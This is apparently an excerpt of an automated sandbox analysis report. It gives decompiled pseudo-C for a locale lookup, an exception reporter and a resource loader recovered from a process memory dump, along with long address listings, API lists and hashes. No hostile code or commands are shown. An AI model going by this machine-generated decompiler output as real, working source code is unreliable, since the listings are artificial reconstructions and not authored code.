                                                                                                0x00f79d51
                                                                                                0x00f79d54
                                                                                                0x00f79d59
                                                                                                0x00f79d5b
                                                                                                0x00f79d60
                                                                                                0x00f79d64
                                                                                                0x00f79d6a
                                                                                                0x00f79d70
                                                                                                0x00f79d73
                                                                                                0x00f79d7a
                                                                                                0x00f79d81
                                                                                                0x00f79d84
                                                                                                0x00f79d8b
                                                                                                0x00f79d92
                                                                                                0x00f79d96
                                                                                                0x00f79da0
                                                                                                0x00f79da3
                                                                                                0x00f79da8
                                                                                                0x00f79dab
                                                                                                0x00f79dad
                                                                                                0x00f79dbc
                                                                                                0x00f79dc1
                                                                                                0x00f79dc1
                                                                                                0x00f79dc3
                                                                                                0x00f79dc6
                                                                                                0x00f79dc8
                                                                                                0x00f79dcd
                                                                                                0x00f79dcf
                                                                                                0x00f79dd4
                                                                                                0x00f79dd7
                                                                                                0x00f79dde
                                                                                                0x00f79de6
                                                                                                0x00f79deb
                                                                                                0x00f79def
                                                                                                0x00f79df4
                                                                                                0x00f79dfc
                                                                                                0x00f79dff
                                                                                                0x00f79e00
                                                                                                0x00f79e1d
                                                                                                0x00f79e1d
                                                                                                0x00f79de6
                                                                                                0x00f79e28
                                                                                                0x00f79e2d
                                                                                                0x00f79e39
                                                                                                0x00f79e45
                                                                                                0x00f79e4a
                                                                                                0x00f79e51
                                                                                                0x00f79e5c
                                                                                                0x00f79e68
                                                                                                0x00f79e6b
                                                                                                0x00f79e7f
                                                                                                0x00f79e84
                                                                                                0x00f79e87
                                                                                                0x00f79e8e
                                                                                                0x00f79e94
                                                                                                0x00f79ebb
                                                                                                0x00f79ebb
                                                                                                0x00f79ec4
                                                                                                0x00f79ecb
                                                                                                0x00f79ed2
                                                                                                0x00f79ee9
                                                                                                0x00f79e96
                                                                                                0x00f79e96
                                                                                                0x00f79e9a
                                                                                                0x00f79ea1
                                                                                                0x00f79eb0
                                                                                                0x00f79eb2
                                                                                                0x00f79eb5
                                                                                                0x00f79eb5
                                                                                                0x00000000
                                                                                                0x00f79ea3
                                                                                                0x00f79ea3
                                                                                                0x00f79ea6
                                                                                                0x00f79ea8
                                                                                                0x00f79eae
                                                                                                0x00f79eec
                                                                                                0x00f79ef1
                                                                                                0x00f79ef2
                                                                                                0x00f79ef3
                                                                                                0x00f79ef4
                                                                                                0x00f79ef5
                                                                                                0x00f79ef6
                                                                                                0x00f79ef7
                                                                                                0x00f79ef8
                                                                                                0x00f79ef9
                                                                                                0x00f79efa
                                                                                                0x00f79efb
                                                                                                0x00f79efc
                                                                                                0x00f79efd
                                                                                                0x00f79efe
                                                                                                0x00f79eff
                                                                                                0x00f79f00
                                                                                                0x00f79f01
                                                                                                0x00f79f03
                                                                                                0x00f79f05
                                                                                                0x00f79f10
                                                                                                0x00f79f11
                                                                                                0x00f79f14
                                                                                                0x00f79f19
                                                                                                0x00f79f1b
                                                                                                0x00f79f1e
                                                                                                0x00f79f1f
                                                                                                0x00f79f20
                                                                                                0x00f79f24
                                                                                                0x00f79f2a
                                                                                                0x00f79f30
                                                                                                0x00f79f33
                                                                                                0x00f79f3a
                                                                                                0x00f79f41
                                                                                                0x00f79f44
                                                                                                0x00f79f4b
                                                                                                0x00f79f52
                                                                                                0x00f79f56
                                                                                                0x00f79f60
                                                                                                0x00f79f63
                                                                                                0x00f79f68
                                                                                                0x00f79f6b
                                                                                                0x00f79f6d
                                                                                                0x00f79f6f
                                                                                                0x00f79f75
                                                                                                0x00f79f75
                                                                                                0x00f79f7a
                                                                                                0x00f79f7c
                                                                                                0x00f79f81
                                                                                                0x00f79f81
                                                                                                0x00f79f81
                                                                                                0x00f79f71
                                                                                                0x00f79f71
                                                                                                0x00f79f73
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f79f73
                                                                                                0x00f79f6f
                                                                                                0x00f79f83
                                                                                                0x00f79f86
                                                                                                0x00f79f88
                                                                                                0x00f79f8d
                                                                                                0x00f79f8f
                                                                                                0x00f79f94
                                                                                                0x00f79f97
                                                                                                0x00f79f9e
                                                                                                0x00f79fa6
                                                                                                0x00f79fab
                                                                                                0x00f79faf
                                                                                                0x00f79fb4
                                                                                                0x00f79fbc
                                                                                                0x00f79fbf
                                                                                                0x00f79fc0
                                                                                                0x00f79fd3
                                                                                                0x00f79fdd
                                                                                                0x00f79fdd
                                                                                                0x00f79fdd
                                                                                                0x00f79fa6
                                                                                                0x00f79fe8
                                                                                                0x00f79fed
                                                                                                0x00f79ff9
                                                                                                0x00f79ffe
                                                                                                0x00f7a005
                                                                                                0x00f7a00a
                                                                                                0x00f7a011
                                                                                                0x00f7a01c
                                                                                                0x00f7a021
                                                                                                0x00f7a028
                                                                                                0x00f7a02b
                                                                                                0x00f7a03f
                                                                                                0x00f7a044
                                                                                                0x00f7a047
                                                                                                0x00f7a04e
                                                                                                0x00f7a051
                                                                                                0x00f7a054
                                                                                                0x00f7a07b
                                                                                                0x00f7a07b
                                                                                                0x00f7a084
                                                                                                0x00f7a08b
                                                                                                0x00f7a092
                                                                                                0x00f7a09f
                                                                                                0x00f7a0a9
                                                                                                0x00f7a056
                                                                                                0x00f7a056
                                                                                                0x00f7a05a
                                                                                                0x00f7a05c
                                                                                                0x00f7a061
                                                                                                0x00f7a070
                                                                                                0x00f7a070
                                                                                                0x00f7a072
                                                                                                0x00f7a075
                                                                                                0x00f7a075
                                                                                                0x00000000
                                                                                                0x00f7a063
                                                                                                0x00f7a063
                                                                                                0x00f7a068
                                                                                                0x00f7a06b
                                                                                                0x00f7a06e
                                                                                                0x00f7a0ac
                                                                                                0x00f7a0b1
                                                                                                0x00f7a0b2
                                                                                                0x00f7a0b3
                                                                                                0x00f7a0b4
                                                                                                0x00f7a0b5
                                                                                                0x00f7a0b6
                                                                                                0x00f7a0b7
                                                                                                0x00f7a0b8
                                                                                                0x00f7a0b9
                                                                                                0x00f7a0ba
                                                                                                0x00f7a0bb
                                                                                                0x00f7a0bc
                                                                                                0x00f7a0bd
                                                                                                0x00f7a0be
                                                                                                0x00f7a0bf
                                                                                                0x00f7a0c0
                                                                                                0x00f7a0c6
                                                                                                0x00f7a0c9
                                                                                                0x00f7a0d0
                                                                                                0x00f7a0d4
                                                                                                0x00f7a0dc
                                                                                                0x00f7a0e0
                                                                                                0x00f7a0e1
                                                                                                0x00f7a0e6
                                                                                                0x00f7a11d
                                                                                                0x00f7a12e
                                                                                                0x00f7a138
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7a06e
                                                                                                0x00f7a061
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f79eae
                                                                                                0x00f79ea1

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: _swprintf$FreeLocal
                                                                                                • String ID:
                                                                                                • API String ID: 2429749586-0
                                                                                                • Opcode ID: 808df3a4c40152541e85004f7dbb37a1ecbb02f45b646751cd16195d35e6453e
                                                                                                • Instruction ID: c71c1e2c11023683d7b3c1b1774eb651a7019f9ddc1822e34013c3e65c8e98a1
                                                                                                • Opcode Fuzzy Hash: 808df3a4c40152541e85004f7dbb37a1ecbb02f45b646751cd16195d35e6453e
                                                                                                • Instruction Fuzzy Hash: C6C1CE71E00108ABDF19DFA4DC55FAEBBB9FF48310F00822AF815A7281DB75A915DB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 92%
                                                                                                			E00FACEFD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, short* _a8, short* _a12) {
                                                                                                				signed int _v8;
                                                                                                				int _v12;
                                                                                                				int _v16;
                                                                                                				char _v20;
                                                                                                				signed int* _v24;
                                                                                                				short* _v28;
                                                                                                				void* __ebp;
                                                                                                				signed int _t39;
                                                                                                				void* _t45;
                                                                                                				signed int* _t46;
                                                                                                				signed int _t47;
                                                                                                				short* _t48;
                                                                                                				int _t49;
                                                                                                				short* _t55;
                                                                                                				short* _t56;
                                                                                                				short* _t57;
                                                                                                				int _t65;
                                                                                                				int _t67;
                                                                                                				short* _t71;
                                                                                                				intOrPtr _t74;
                                                                                                				void* _t76;
                                                                                                				short* _t77;
                                                                                                				intOrPtr _t84;
                                                                                                				short* _t88;
                                                                                                				short* _t91;
                                                                                                				short** _t102;
                                                                                                				short* _t103;
                                                                                                				signed int _t105;
                                                                                                				signed short _t108;
                                                                                                				signed int _t109;
                                                                                                				void* _t110;
                                                                                                
                                                                                                				_t39 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_v8 = _t39 ^ _t109;
                                                                                                				_t88 = _a12;
                                                                                                				_t105 = _a4;
                                                                                                				_v28 = _a8;
                                                                                                				_v24 = E00FA5DF2(__ecx, __edx) + 0x50;
                                                                                                				asm("stosd");
                                                                                                				asm("stosd");
                                                                                                				asm("stosd");
                                                                                                				_t45 = E00FA5DF2(__ecx, __edx);
                                                                                                				_t99 = 0;
                                                                                                				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
                                                                                                				_t91 = _t105 + 0x80;
                                                                                                				_t46 = _v24;
                                                                                                				 *_t46 = _t105;
                                                                                                				_t102 =  &(_t46[1]);
                                                                                                				 *_t102 = _t91;
                                                                                                				if(_t91 != 0 &&  *_t91 != 0) {
                                                                                                					_t84 =  *0xfbe254; // 0x17
                                                                                                					E00FACE9A(_t91, 0, 0xfbe140, _t84 - 1, _t102);
                                                                                                					_t46 = _v24;
                                                                                                					_t110 = _t110 + 0xc;
                                                                                                					_t99 = 0;
                                                                                                				}
                                                                                                				_v20 = _t99;
                                                                                                				_t47 =  *_t46;
                                                                                                				if(_t47 == 0 ||  *_t47 == _t99) {
                                                                                                					_t48 =  *_t102;
                                                                                                					__eflags = _t48;
                                                                                                					if(_t48 == 0) {
                                                                                                						L19:
                                                                                                						_v20 = 0x104;
                                                                                                						_t49 = GetUserDefaultLCID();
                                                                                                						_v12 = _t49;
                                                                                                						_v16 = _t49;
                                                                                                						goto L20;
                                                                                                					}
                                                                                                					__eflags =  *_t48 - _t99;
                                                                                                					if(__eflags == 0) {
                                                                                                						goto L19;
                                                                                                					}
                                                                                                					E00FAC834(_t91, _t99, __eflags,  &_v20);
                                                                                                					_pop(_t91);
                                                                                                					goto L20;
                                                                                                				} else {
                                                                                                					_t71 =  *_t102;
                                                                                                					if(_t71 == 0) {
                                                                                                						L8:
                                                                                                						E00FAC91A(_t91, _t99, __eflags,  &_v20);
                                                                                                						L9:
                                                                                                						_pop(_t91);
                                                                                                						if(_v20 != 0) {
                                                                                                							_t103 = 0;
                                                                                                							__eflags = 0;
                                                                                                							L25:
                                                                                                							asm("sbb esi, esi");
                                                                                                							_t108 = E00FACD22(_t91,  ~_t105 & _t105 + 0x00000100,  &_v20);
                                                                                                							__eflags = _t108;
                                                                                                							if(_t108 == 0) {
                                                                                                								L22:
                                                                                                								L23:
                                                                                                								return E00F80D7F(_v8 ^ _t109, _t99);
                                                                                                							}
                                                                                                							_t55 = IsValidCodePage(_t108 & 0x0000ffff);
                                                                                                							__eflags = _t55;
                                                                                                							if(_t55 == 0) {
                                                                                                								goto L22;
                                                                                                							}
                                                                                                							_t56 = IsValidLocale(_v16, 1);
                                                                                                							__eflags = _t56;
                                                                                                							if(_t56 == 0) {
                                                                                                								goto L22;
                                                                                                							}
                                                                                                							_t57 = _v28;
                                                                                                							__eflags = _t57;
                                                                                                							if(_t57 != 0) {
                                                                                                								 *_t57 = _t108;
                                                                                                							}
                                                                                                							E00FA7BDE(_v16,  &(_v24[0x94]), 0x55, _t103);
                                                                                                							__eflags = _t88;
                                                                                                							if(_t88 == 0) {
                                                                                                								L34:
                                                                                                								goto L23;
                                                                                                							}
                                                                                                							_t33 =  &(_t88[0x90]); // 0xfa3ba1
                                                                                                							E00FA7BDE(_v16, _t33, 0x55, _t103);
                                                                                                							_t65 = GetLocaleInfoW(_v16, 0x1001, _t88, 0x40);
                                                                                                							__eflags = _t65;
                                                                                                							if(_t65 == 0) {
                                                                                                								goto L22;
                                                                                                							}
                                                                                                							_t36 =  &(_t88[0x40]); // 0xfa3b01
                                                                                                							_t67 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
                                                                                                							__eflags = _t67;
                                                                                                							if(_t67 == 0) {
                                                                                                								goto L22;
                                                                                                							}
                                                                                                							_t38 =  &(_t88[0x80]); // 0xfa3b81
                                                                                                							E00F9C35F(_t38, _t108, _t38, 0x10, 0xa);
                                                                                                							goto L34;
                                                                                                						}
                                                                                                						_t74 =  *0xfbe13c; // 0x41
                                                                                                						_t76 = E00FACE9A(_t91, _t99, 0xfbde30, _t74 - 1, _v24);
                                                                                                						_t110 = _t110 + 0xc;
                                                                                                						if(_t76 == 0) {
                                                                                                							L20:
                                                                                                							_t103 = 0;
                                                                                                							__eflags = 0;
                                                                                                							L21:
                                                                                                							if(_v20 != 0) {
                                                                                                								goto L25;
                                                                                                							}
                                                                                                							goto L22;
                                                                                                						}
                                                                                                						_t77 =  *_t102;
                                                                                                						_t103 = 0;
                                                                                                						if(_t77 == 0) {
                                                                                                							L14:
                                                                                                							E00FAC91A(_t91, _t99, __eflags,  &_v20);
                                                                                                							L15:
                                                                                                							_pop(_t91);
                                                                                                							goto L21;
                                                                                                						}
                                                                                                						_t123 =  *_t77;
                                                                                                						if( *_t77 == 0) {
                                                                                                							goto L14;
                                                                                                						}
                                                                                                						E00FAC87F(_t91, _t99, _t123,  &_v20);
                                                                                                						goto L15;
                                                                                                					}
                                                                                                					_t119 =  *_t71 - _t99;
                                                                                                					if( *_t71 == _t99) {
                                                                                                						goto L8;
                                                                                                					}
                                                                                                					E00FAC87F(_t91, _t99, _t119,  &_v20);
                                                                                                					goto L9;
                                                                                                				}
                                                                                                			}


































                                                                                                0x00facf05
                                                                                                0x00facf0c
                                                                                                0x00facf13
                                                                                                0x00facf17
                                                                                                0x00facf1b
                                                                                                0x00facf29
                                                                                                0x00facf2e
                                                                                                0x00facf2f
                                                                                                0x00facf30
                                                                                                0x00facf31
                                                                                                0x00facf39
                                                                                                0x00facf3b
                                                                                                0x00facf41
                                                                                                0x00facf47
                                                                                                0x00facf4a
                                                                                                0x00facf4c
                                                                                                0x00facf4f
                                                                                                0x00facf53
                                                                                                0x00facf5a
                                                                                                0x00facf67
                                                                                                0x00facf6c
                                                                                                0x00facf6f
                                                                                                0x00facf72
                                                                                                0x00facf72
                                                                                                0x00facf74
                                                                                                0x00facf77
                                                                                                0x00facf7b
                                                                                                0x00facfeb
                                                                                                0x00facfed
                                                                                                0x00facfef
                                                                                                0x00fad002
                                                                                                0x00fad002
                                                                                                0x00fad009
                                                                                                0x00fad00f
                                                                                                0x00fad012
                                                                                                0x00000000
                                                                                                0x00fad012
                                                                                                0x00facff1
                                                                                                0x00facff4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00facffa
                                                                                                0x00facfff
                                                                                                0x00000000
                                                                                                0x00facf82
                                                                                                0x00facf82
                                                                                                0x00facf86
                                                                                                0x00facf98
                                                                                                0x00facf9c
                                                                                                0x00facfa1
                                                                                                0x00facfa5
                                                                                                0x00facfa6
                                                                                                0x00fad030
                                                                                                0x00fad030
                                                                                                0x00fad032
                                                                                                0x00fad03e
                                                                                                0x00fad048
                                                                                                0x00fad04c
                                                                                                0x00fad04e
                                                                                                0x00fad01d
                                                                                                0x00fad01f
                                                                                                0x00fad02f
                                                                                                0x00fad02f
                                                                                                0x00fad054
                                                                                                0x00fad05a
                                                                                                0x00fad05c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fad063
                                                                                                0x00fad069
                                                                                                0x00fad06b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fad06d
                                                                                                0x00fad070
                                                                                                0x00fad072
                                                                                                0x00fad074
                                                                                                0x00fad074
                                                                                                0x00fad085
                                                                                                0x00fad08a
                                                                                                0x00fad08c
                                                                                                0x00fad0ec
                                                                                                0x00000000
                                                                                                0x00fad0ee
                                                                                                0x00fad091
                                                                                                0x00fad09b
                                                                                                0x00fad0ab
                                                                                                0x00fad0b1
                                                                                                0x00fad0b3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fad0bb
                                                                                                0x00fad0ca
                                                                                                0x00fad0d0
                                                                                                0x00fad0d2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fad0dc
                                                                                                0x00fad0e4
                                                                                                0x00000000
                                                                                                0x00fad0e9
                                                                                                0x00facfac
                                                                                                0x00facfbb
                                                                                                0x00facfc0
                                                                                                0x00facfc5
                                                                                                0x00fad015
                                                                                                0x00fad015
                                                                                                0x00fad015
                                                                                                0x00fad017
                                                                                                0x00fad01b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fad01b
                                                                                                0x00facfc7
                                                                                                0x00facfc9
                                                                                                0x00facfcd
                                                                                                0x00facfdf
                                                                                                0x00facfe3
                                                                                                0x00facfe8
                                                                                                0x00facfe8
                                                                                                0x00000000
                                                                                                0x00facfe8
                                                                                                0x00facfcf
                                                                                                0x00facfd2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00facfd8
                                                                                                0x00000000
                                                                                                0x00facfd8
                                                                                                0x00facf88
                                                                                                0x00facf8b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00facf91
                                                                                                0x00000000
                                                                                                0x00facf91

                                                                                                APIs
                                                                                                  • Part of subcall function 00FA5DF2: GetLastError.KERNEL32(?,?,00000008,00FAA789,00F85649,00F8568F), ref: 00FA5DF7
                                                                                                  • Part of subcall function 00FA5DF2: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00FA5E95
                                                                                                  • Part of subcall function 00FA5DF2: _free.LIBCMT ref: 00FA5E54
                                                                                                  • Part of subcall function 00FA5DF2: _free.LIBCMT ref: 00FA5E8A
                                                                                                • GetUserDefaultLCID.KERNEL32(00000055,?,?), ref: 00FAD009
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00FAD054
                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00FAD063
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,00FA3A81,00000040,?,00FA3BA1,00000055,00000000,?,?,00000055,00000000), ref: 00FAD0AB
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00FA3B01,00000040), ref: 00FAD0CA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                • String ID:
                                                                                                • API String ID: 949163717-0
                                                                                                • Opcode ID: adf1b1fe11674c8270b30837a2d4b59b86ea5bdf94712d0a3b7e833d89d56e7c
                                                                                                • Instruction ID: 2c2b5863261149b3c0276f49d6a11330ca4bfc396662bc36a27cb39222985252
                                                                                                • Opcode Fuzzy Hash: adf1b1fe11674c8270b30837a2d4b59b86ea5bdf94712d0a3b7e833d89d56e7c
                                                                                                • Instruction Fuzzy Hash: F65190B2E00209AFDB10DFA5CC41EBAB7B8FF4A710F144529F905EB151EB749905EBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E00F98BDE(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                				char _v0;
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v524;
                                                                                                				intOrPtr _v528;
                                                                                                				void* _v532;
                                                                                                				intOrPtr _v536;
                                                                                                				char _v540;
                                                                                                				intOrPtr _v544;
                                                                                                				intOrPtr _v548;
                                                                                                				intOrPtr _v552;
                                                                                                				intOrPtr _v556;
                                                                                                				intOrPtr _v560;
                                                                                                				intOrPtr _v564;
                                                                                                				intOrPtr _v568;
                                                                                                				intOrPtr _v572;
                                                                                                				intOrPtr _v576;
                                                                                                				intOrPtr _v580;
                                                                                                				intOrPtr _v584;
                                                                                                				char _v724;
                                                                                                				intOrPtr _v792;
                                                                                                				intOrPtr _v800;
                                                                                                				char _v804;
                                                                                                				struct _EXCEPTION_POINTERS _v812;
                                                                                                				signed int _t40;
                                                                                                				char* _t47;
                                                                                                				char* _t49;
                                                                                                				intOrPtr _t61;
                                                                                                				intOrPtr _t62;
                                                                                                				intOrPtr _t66;
                                                                                                				intOrPtr _t67;
                                                                                                				int _t68;
                                                                                                				intOrPtr _t69;
                                                                                                				signed int _t70;
                                                                                                
                                                                                                				_t69 = __esi;
                                                                                                				_t67 = __edi;
                                                                                                				_t66 = __edx;
                                                                                                				_t61 = __ebx;
                                                                                                				_t40 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_t41 = _t40 ^ _t70;
                                                                                                				_v8 = _t40 ^ _t70;
                                                                                                				if(_a4 != 0xffffffff) {
                                                                                                					_push(_a4);
                                                                                                					E00F81812(_t41);
                                                                                                					_pop(_t62);
                                                                                                				}
                                                                                                				E00F95A00(_t67,  &_v804, 0, 0x50);
                                                                                                				E00F95A00(_t67,  &_v724, 0, 0x2cc);
                                                                                                				_v812.ExceptionRecord =  &_v804;
                                                                                                				_t47 =  &_v724;
                                                                                                				_v812.ContextRecord = _t47;
                                                                                                				_v548 = _t47;
                                                                                                				_v552 = _t62;
                                                                                                				_v556 = _t66;
                                                                                                				_v560 = _t61;
                                                                                                				_v564 = _t69;
                                                                                                				_v568 = _t67;
                                                                                                				_v524 = ss;
                                                                                                				_v536 = cs;
                                                                                                				_v572 = ds;
                                                                                                				_v576 = es;
                                                                                                				_v580 = fs;
                                                                                                				_v584 = gs;
                                                                                                				asm("pushfd");
                                                                                                				_pop( *_t22);
                                                                                                				_v540 = _v0;
                                                                                                				_t49 =  &_v0;
                                                                                                				_v528 = _t49;
                                                                                                				_v724 = 0x10001;
                                                                                                				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                                                                				_v804 = _a8;
                                                                                                				_v800 = _a12;
                                                                                                				_v792 = _v0;
                                                                                                				_t68 = IsDebuggerPresent();
                                                                                                				SetUnhandledExceptionFilter(0);
                                                                                                				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                                                                                                					_push(_a4);
                                                                                                					E00F81812(_t57);
                                                                                                				}
                                                                                                				return E00F80D7F(_v8 ^ _t70, _t66);
                                                                                                			}




































                                                                                                0x00f98bde
                                                                                                0x00f98bde
                                                                                                0x00f98bde
                                                                                                0x00f98bde
                                                                                                0x00f98be9
                                                                                                0x00f98bee
                                                                                                0x00f98bf0
                                                                                                0x00f98bf8
                                                                                                0x00f98bfa
                                                                                                0x00f98bfd
                                                                                                0x00f98c02
                                                                                                0x00f98c02
                                                                                                0x00f98c0e
                                                                                                0x00f98c21
                                                                                                0x00f98c2f
                                                                                                0x00f98c35
                                                                                                0x00f98c3b
                                                                                                0x00f98c41
                                                                                                0x00f98c47
                                                                                                0x00f98c4d
                                                                                                0x00f98c53
                                                                                                0x00f98c59
                                                                                                0x00f98c5f
                                                                                                0x00f98c65
                                                                                                0x00f98c6c
                                                                                                0x00f98c73
                                                                                                0x00f98c7a
                                                                                                0x00f98c81
                                                                                                0x00f98c88
                                                                                                0x00f98c8f
                                                                                                0x00f98c90
                                                                                                0x00f98c99
                                                                                                0x00f98c9f
                                                                                                0x00f98ca2
                                                                                                0x00f98ca8
                                                                                                0x00f98cb5
                                                                                                0x00f98cbe
                                                                                                0x00f98cc7
                                                                                                0x00f98cd0
                                                                                                0x00f98cde
                                                                                                0x00f98ce0
                                                                                                0x00f98cf5
                                                                                                0x00f98d01
                                                                                                0x00f98d04
                                                                                                0x00f98d09
                                                                                                0x00f98d18

                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00F98CD6
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F98CE0
                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00F98CED
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: db7cc18d9705bdad1bc9ca73b70310616f01076e166f63cd5379fb4890a6b6bc
                                                                                                • Instruction ID: 8784e74a9e71c3dc54328e4af9ceaf24ff3c0defa52d4a2aec4cd8cfac74a100
                                                                                                • Opcode Fuzzy Hash: db7cc18d9705bdad1bc9ca73b70310616f01076e166f63cd5379fb4890a6b6bc
                                                                                                • Instruction Fuzzy Hash: 1231C27590121C9BDB21DF68DD89BC9BBB8BF18750F5042EAE40CA7250EB349B869F44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 84%
                                                                                                			E00F74A30(struct HINSTANCE__* __ecx, struct HRSRC__* __edx, signed int _a4) {
                                                                                                				char _v16;
                                                                                                				signed int _t9;
                                                                                                				void* _t12;
                                                                                                				struct HINSTANCE__* _t19;
                                                                                                				signed int _t26;
                                                                                                				void* _t30;
                                                                                                				struct HRSRC__* _t32;
                                                                                                				signed short* _t37;
                                                                                                				signed int _t40;
                                                                                                
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb59b0);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t9 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_push(_t9 ^ _t40);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_t32 = __edx;
                                                                                                				_t19 = __ecx;
                                                                                                				_t12 = LoadResource(__ecx, __edx);
                                                                                                				if(_t12 == 0) {
                                                                                                					L8:
                                                                                                					 *[fs:0x0] = _v16;
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					_t37 = LockResource(_t12);
                                                                                                					if(_t37 == 0) {
                                                                                                						goto L8;
                                                                                                					} else {
                                                                                                						_t30 = _t37 + SizeofResource(_t19, _t32);
                                                                                                						_t26 = _a4 & 0x0000000f;
                                                                                                						if(_t26 <= 0) {
                                                                                                							L5:
                                                                                                							if(_t37 >= _t30 ||  *_t37 == 0) {
                                                                                                								goto L8;
                                                                                                							} else {
                                                                                                								 *[fs:0x0] = _v16;
                                                                                                								return _t37;
                                                                                                							}
                                                                                                						} else {
                                                                                                							while(_t37 < _t30) {
                                                                                                								_t37 =  &(( &(_t37[ *_t37 & 0x0000ffff]))[1]);
                                                                                                								_t26 = _t26 - 1;
                                                                                                								if(_t26 != 0) {
                                                                                                									continue;
                                                                                                								} else {
                                                                                                									goto L5;
                                                                                                								}
                                                                                                								goto L9;
                                                                                                							}
                                                                                                							goto L8;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				L9:
                                                                                                			}












                                                                                                0x00f74a33
                                                                                                0x00f74a35
                                                                                                0x00f74a40
                                                                                                0x00f74a44
                                                                                                0x00f74a4b
                                                                                                0x00f74a4f
                                                                                                0x00f74a55
                                                                                                0x00f74a57
                                                                                                0x00f74a5b
                                                                                                0x00f74a63
                                                                                                0x00f74ab5
                                                                                                0x00f74aba
                                                                                                0x00f74ac8
                                                                                                0x00f74a65
                                                                                                0x00f74a6c
                                                                                                0x00f74a70
                                                                                                0x00000000
                                                                                                0x00f74a72
                                                                                                0x00f74a7d
                                                                                                0x00f74a80
                                                                                                0x00f74a83
                                                                                                0x00f74a97
                                                                                                0x00f74a99
                                                                                                0x00000000
                                                                                                0x00f74aa1
                                                                                                0x00f74aa6
                                                                                                0x00f74ab4
                                                                                                0x00f74ab4
                                                                                                0x00f74a85
                                                                                                0x00f74a85
                                                                                                0x00f74a8f
                                                                                                0x00f74a92
                                                                                                0x00f74a95
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f74a95
                                                                                                0x00000000
                                                                                                0x00f74a85
                                                                                                0x00f74a83
                                                                                                0x00f74a70
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • LoadResource.KERNEL32(00000000,00000000,FD8FA683,00000001,00000000,?,00000000,00FB59B0,000000FF,?,00F7401D,00F736B8,?,00000000,00000000,?), ref: 00F74A5B
